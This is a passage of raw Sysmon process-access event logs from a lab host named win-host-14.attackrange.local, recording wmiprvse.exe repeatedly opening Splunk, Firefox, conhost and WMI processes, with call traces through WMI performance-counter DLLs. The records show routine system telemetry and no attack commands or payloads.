EM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151255Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7105-60CA-190D-00000000D101}7116C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151254Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7105-60CA-190D-00000000D101}7116C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151253Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151252Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151251Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151250Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151249Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151248Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151247Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151246Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151245Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151244Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151243Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151242Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151241Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151240Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\Wm